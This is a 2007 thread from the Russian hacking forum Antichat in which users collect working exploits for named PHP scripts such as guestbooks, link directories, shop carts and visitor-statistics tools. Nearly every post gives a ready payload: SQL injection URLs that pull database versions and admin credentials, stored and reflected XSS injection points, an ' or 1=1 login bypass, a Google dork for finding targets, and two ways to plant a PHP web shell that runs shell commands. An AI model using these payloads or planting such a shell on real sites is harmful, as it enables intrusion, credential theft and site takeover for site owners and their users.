Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

Lesnoy_chelovek 29.05.2007 22:28

В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.

NOmeR1 02.06.2007 23:41

siteframe SQL inj
http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATAB ASE(),0x3a,USER())/*
Скромно, но полезно :)

Grey 04.06.2007 21:20

WR-Guest 1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.

Dagon 06.06.2007 16:22

SimPoll v.1.0

Активная XSS:

админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта

google dork: inurl:test_poll_results.php

dmnt 07.06.2007 17:40

cartkeeper

SQL-inj

hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+s elect+1,version(),3,user()/*

Grey 09.06.2007 22:40

Скрипты статистики посещений:

1. Сервер статистики ГелиоСтат

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

2. pronuserinfoSQL v1.2

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

SQL инъекция:

На странице view.php в поле "отследить последних..." вводим:

' union select 1,2,3,4,5,6/*

3. SEbotInfo 2.0

Активная XSS:

На странице в sebot.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php.

4. BotsInfo v0.03

Активная XSS:

На странице в write.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.

Grey 15.06.2007 14:18

EJ3 TOP 1.4

Заливка шелла:

При добавление ссылки на сайт в поле Banner URL вводим:

'; ?> <?php Код шелла ?> <?php $a='

После ввода данных получаем ID:

К примеру: 1181902021

Шелл будет доступен по адресу:

http://site.ru/data/1181902021info.php

http://site.ru/data/[id]info.php

-----------------------------------------------------------

Ссылки и каталоги ссылок

1. Link Database

SQL инъекция:

http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/*

2. Link Up

SQL инъекция:

http://site.ru/category.php?category=-1+union+select+1,2/*

Доступ в админку:

http://site.ru/admin/index.php

В поле Username вводим:
' or 1=1 /*

3. SM(links) v2.0

Отсутствие .htaccess:

Смотрим файл config.inc - в нём хранятся логин и пароль к админке:

http://site.ru/config.inc

4. xLink v2.1

Пассивная XSS:

http://site.ru/poisk.php?poisk='><script>alert();</script>

5. My Link 1.00

Активная XSS:

При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок.

6. Quick Link

Активная XSS:

При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.

_Pantera_ 20.06.2007 16:54

scozbook 1.1
Код:

http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*

Grey 26.06.2007 19:52

Гостевые книги:

FastStarter

Активная XSS:

Вписываем скрипт в поле name.

Mandralivre 4.1

Активные XSS:

Вписываем скрипт в поля Votre nom, Votre email, Votre site web.

hwdeGUEST 2.0

Активная XSS:

Вписываем скрипт в поле Name.

_Pantera_ 28.06.2007 02:27

Закрытая гостевая книга v 1.0 (websmith)

вход в админку без пароля
Код:

www.site.ru/admin/index.php
гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
_________________

guest v1.1

если криво настроены права то можно прочитать файл с логином и паролем
Код:

www.site.ru/passwd.dat
все это дело выглядит след образом
PHP код:

<?php
$Password
['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
?>

логин - admin
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4

заливка шелла выполняеться из админ панели
Код:

http://site.ru/admin.php?design
в поле файла header.inc.php вписываем
PHP код:

<?php system($_GET[cmd]); ?>

и выполняем
Код:

http://site.ru/design/header.inc.php?cmd=команда


Время: 06:05